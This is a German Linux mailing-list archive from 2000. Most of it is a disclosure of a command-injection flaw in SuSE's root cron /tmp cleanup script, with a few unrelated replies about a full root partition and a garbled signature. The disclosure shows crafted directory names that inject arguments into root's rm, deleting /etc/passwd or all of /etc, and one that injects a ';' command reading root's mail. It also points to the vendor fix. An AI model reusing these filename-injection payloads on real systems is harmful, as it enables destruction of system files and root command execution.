* Wolfgang Weisselberg wrote on Wed, 28 Jun 2000:

Dir ist aber klar, dass das SuSE-/tmp-cleanup-Script eine heftige Sicherheitsluecke ist, wenn man nicht allen lokalen Usern trauen kann?

Kannst du das mal etwas detailierter ausfuehren? -Dirk --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com

Matthias Dort schrieb in 0,4K (19 Zeilen):

On Wed, 28 Jun 2000, Wolfgang Weisselberg wrote:

...

Dir ist aber klar, dass das SuSE-/tmp-cleanup-Script eine heftige Sicherheitsluecke ist, wenn man nicht allen lokalen Usern trauen kann?

würdest du das mal bitte etwas genauer Erläutern ?

[Bitte vor der Panik das Ende der Mail abwarten] /tmp ist fuer alle lokalen User frei beschreibbar. Es ist trivial, beliebige Direktory-Strukturen zu generieren ... und beliebige Files. /etc/cron.daily/aaa_base_clean_tmp: [...] for TMP_DIR in $TMP_DIRS_TO_CLEAR ; do for DEL_FILE in `find $TMP_DIR/. $OMIT \( -type f -o -type l \) \ -atime +$MAX_DAYS_IN_TMP -printf "\"%p\"\n" \ | sort -r` ; do rm -f $DEL_FILE [...] Ok ... ich will /etc/passwd loeschen ... $ mkdir -p /tmp/xxx\"\ \"/etc $ touch /tmp/xxx\"\ \"/etc/passwd mal sehen: $ find /tmp/. \( -type f -o -type l \) \ -printf "\"%p\"\n" \ | sort -r | grep pass find: /tmp/./screens/S-root: Permission denied find: /tmp/./screens/S-test: Permission denied find: /tmp/./YaST.tdir: Permission denied "/tmp/./xxx" "/etc/passwd" ^^^^^^^^^^^^^ $ rm "/tmp/./xxx" "/etc/passwd" rm: cannot remove `/tmp/./xxx': No such file or directory rm: remove write-protected file `/etc/passwd'? y rm: cannot unlink `/etc/passwd': Permission denied $ rm -f "/tmp/./xxx" "/etc/passwd" rm: cannot unlink `/etc/passwd': Permission denied Aber root kann ... :-) und das Problem mit der atime: $ ls -la --time=access /tmp/xxx\"\ \"/etc/passwd -rw-r--r-- 1 weissel users 0 Jun 30 00:43 /tmp/xxx" "/etc/passwd $ touch -a --date="1 January 1970" /tmp/xxx\"\ \"/etc/passwd $ ls -la --time=access /tmp/xxx\"\ \"/etc/passwd -rw-r--r-- 1 weissel users 0 Jan 1 1970 /tmp/xxx" "/etc/passwd ... ist KEIN Problem mehr. Wie man einen Job mit at oder cron startet und dann das Executable loescht, sollte trivial sein. Also kann ein beliebiger lokaler User beliebige Files (Logfiles, Passwoerter, Datenbanken, Konfigurationen ... ) loeschen, sowohl von root als auch von anderen Usern. Noch schoener ist: $ mkdir -p /tmp/xxx\"\ \-r\ \" $ touch /tmp/xxx\"\ -r\ \"/etc $ find /tmp/. \( -type f -o -type l \) \ -printf "\"%p\"\n" \ | sort -r | grep pass "/tmp/./xxx" -r "/etc" $ rm -f "/tmp/./xxx" -r "/etc" rm: cannot unlink `/etc/fstab': Permission denied rm: cannot unlink `/etc/mtab': Permission denied rm: cannot unlink `/etc/passwd': Permission denied rm: cannot unlink `/etc/group': Permission denied rm: cannot unlink `/etc/DIR_COLORS': Permission denied rm: cannot unlink `/etc/motd': Permission denied rm: cannot unlink `/etc/permissions.local': Permission denied rm: cannot unlink `/etc/SuSE-release': Permission denied rm: cannot unlink `/etc/localtime': Permission denied rm: cannot unlink `/etc/cron.daily/aaa_base': Permission denied rm: cannot unlink `/etc/cron.daily/tetex': Permission denied rm: cannot unlink `/etc/cron.daily/wwwoffle-purge': Permission denied rm: cannot unlink `/etc/cron.daily/news': Permission denied rm: cannot unlink `/etc/cron.daily/aaa_base_backup_rpmdb': Permission denied rm: cannot unlink `/etc/cron.daily/aaa_base_clean_catman': Permission denied rm: cannot unlink `/etc/cron.daily/aaa_base_clean_core': Permission denied [...] Don't try that at home .. or as root ... Und jetzt wollen wir sehen, ob wir ein ";" untergebracht bekommen ... $ mkdir -p /tmp/xxx\"\ \;\ cat\ /var/spool/mail/root\ \"/etc/ $ touch /tmp/xxx\"\ \;\ cat\ /var/spool/mail/root\ \"/etc/shadow $ find /tmp/. \( -type f -o -type l \) \ -printf "\"%p\"\n" \ | sort -r | grep shad "/tmp/./xxx" ; cat /var/spool/mail/root "/etc/shadow" $ rm -f "/tmp/./xxx" ; cat /var/spool/mail/root "/etc/shadow" cat: /var/spool/mail/root: Permission denied cat: /etc/shadow: Permission denied $ su - # rm -f "/tmp/./xxx" ; cat /var/spool/mail/root "/etc/shadow" From root Wed Jun 28 11:30:00 2000 Return-Path: <root> Received: (from root@localhost) [...] dpbox:*:8902:0:10000:::: gdm:*:8902:0:10000:::: ingres:*:8902:0:10000:::: # exit Allerdings *hat* SuSE gefixte Pakete zum Downloaden, dort heisst der relevante Code: find $TMP_DIR/. $OMIT ! -type d \ -atime +$MAX_DAYS_IN_TMP -exec /usr/bin/safe-rm {} \; Dann kann man natuerlich immer noch ein Dir voller Schrott und mit *richtig* vielen Dirs machen, und wenn der Cronjob darin laeuft: mv /tmp/dir /tmp/dir2; ln -s / /tmp/dir Dagegen ist das find nicht sicher ... aber safe-rm cd'd dahin und tested, ob das reale "/etc" == "/tmp/dir/etc" ist ... was natuerlich nicht der Fall ist. Das "cd -P" in /usr/bin/safe-rm scheint allerdings mit oder ohne "-P" das gleiche zu bewirken. ftp://ftp.suse.com/pub/suse/i386/update/6.3/a1/aaa_base.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.4/a1/aaa_base.rpm (und ich nehme an, fuer 6.2 und earlier gilt es entsprechend). -Wolfgang PS: Ich brauche KEIN Cc:, ich lese diese Liste ... offensichtlich. --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com

Bernd Brodesser schrieb in 0,8K (22 Zeilen):

* Wolfgang Weisselberg schrieb am 30.Jun.2000:

...

Allerdings *hat* SuSE gefixte Pakete zum Downloaden, dort heisst der relevante Code: find $TMP_DIR/. $OMIT ! -type d \ -atime +$MAX_DAYS_IN_TMP -exec /usr/bin/safe-rm {} \;

Würde es nicht reiche, einfach die Variablen in "" zu setzen?

Nein. Die Variable heisst ja -->schrott" "/etc/passwd<-- und aus rm "$VARIABLE" wird damit rm "schrott" "/etc/passwd" Hatte ich aber auch so geschrieben. -Wolfgang --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com

* Christian Faubel schrieb am 15.Jun.2000:

So das Problem ist geloest. kurz ein paar worte was geschah: Java hat sich aufgehaengt, ich habe den X-server abgeschossen, und eine Datei im User verzeichnis: .X.err ist solange vollgeschrieben worden bis die root-Partition voll war. Gut finde ich das nicht.

Deshalb unter anderem, ist eine eigene /home-Partition von Vorteil. Eine vollgeschriebene /home-Partition ist zwar auch nicht schön, aber nicht gar so schlimm wie eine vollgeschriebene /-Partition. Bernd -- Bei Fragen an die Liste erst mal nachschauen, ob es diese Frage nicht schon einmal gegeben hat. Ein Archiv der Liste findest Du auf: http://lists.suse.com/archives/suse-linux |Zufallssignatur 7 --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com

Clemens Wohld wrote:

* On Thu, Jun 15, 2000 at 11:27:11AM +0900, Christian Faubel wrote:

...

/*************************************************************/ $B%U%!%&%Y%k!!%/%j%9!!;0MNEE5!(B $B%a%+%H%m%K%/%98&5f=j(B $B!!!!!!!!!!!!#H#A%7%9%F%`8&5fIt!!%m%\%F%#%/%95;=Q%0%k!<%W(B E-mail:chris@mech.rd.sanyo.co.jp

$B")(B570-8502 $BBg:eI\

Cooooool, die sig. lass ich glatt stehen ;)

Sollen wir das jetzt kompilieren oder ist das aus einem Donald Duck-Heft abgeschrieben?

ROTFL!!!!!!!! JLT --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com